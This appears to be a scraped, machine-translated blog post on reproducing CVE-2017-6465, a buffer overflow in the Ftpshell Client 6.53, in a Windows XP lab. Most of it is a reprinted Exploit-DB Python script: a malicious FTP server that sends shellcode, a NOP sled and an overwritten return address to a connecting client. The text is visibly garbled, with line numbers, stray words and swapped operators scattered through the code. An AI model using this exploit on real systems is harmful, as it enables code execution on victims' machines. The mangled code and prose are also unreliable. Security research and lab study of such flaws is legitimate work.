Tag: CTO does not replace Python except add in link nbsp overflow
0x00. Preface
Ftpshell is a popular FTP service tool under the foreign Windows platform, up to the latest version of the client 6.53:http://www.ftpshell.com/downloadclient.htm#
Lab Environment: VMWare + WinXP SP3 EN
Vulnerable App get Address: http://www.ftpshell.com/downloadclient.htm#
0x01. Using
This buffer overflow vulnerability occurs when the client initializes the authentication connection phase with the FTP server, and first installs the Ftpshell client in the experimental environment. 6.53
Here we build a malicious FTP server directly using Python code provided by explit-db
1 #Exploit Title:ftpshell Client 6.53 buffer overflow on making initial connection2 #date:2017-03-043 #Exploit author:peter Baris4 #Vendor homepage:http://www.saptech-erp.com.au5 #Software link:http://www.ftpshell.com/downloadclient.htm6 #version:windows Server R2 x647 #tested On:windows Server R2 Standard x648 #cve:cve-2017-64659 #2017-03-04:software Vendor notifiedTen #2017-03-06:no reply One #2017-03-06:publishing A - ImportSocket - ImportSYS the -Shell= ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" + "\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37" A "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48" at "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48" - "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c" - "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" - "\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48" - "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" - "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48" in "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43" - "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57" to "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a" + "\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b" - "\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53" the "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37" * "\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49" $ "\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"Panax Notoginseng "\x4e\x36\x43\x46\x42\x50\x5a")#replace it with a pop-up calc.exe shellcode. - thePort = 21 + A Try: thes =Socket.socket (socket.af_inet, socket. SOCK_STREAM) +S.bind (("0.0.0.0", port))#bind to Port 21 -S.listen (5)#Turn on FTP service monitoring $ Print("[i] FTP server started on port:"+STR (Port) +"\ r \ n") $ except: - Print("[!] Failed to bind the server to port:"+STR (Port) +"\ r \ n") - the - #004B95DC in Ftpshell.exe PUSH ESI; RETNWuyiEIP ="\xdc\x95\x4b" #This address can still be used in WinXP SP3 en theNops ="\x90"*8 -Junk ="A"* (400-len (Nops)-Len (shell)) WuBuffer = Nops + Shell + junk + EIP#constructs a malicious buffer structure - About whileTrue: $conn, addr =s.accept () -Conn.send ('Welcome to your unfriendly FTP server\r\n') - Print(CONN.RECV (1024)) -Conn.send ("331 ok\r\n") A Print(CONN.RECV (1024)) +Conn.send ('ok\r\n') the Print(CONN.RECV (1024)) -Conn.send ('"'+buffer+'" is current directory\r\n')#Send malicious buffer structure
Execute script, start service
The victim machine Ftpshell Client Connection Malicious FTP server, can find the client immediately error, Shellcode is executed
Note: I did not experiment in Win2008 SP2
0x02. Reference links
exploit-db:https://www.exploit-db.com/exploits/41511/
Buffer overflow utilization of cve-2017-6465 Ftpshell Client 6.53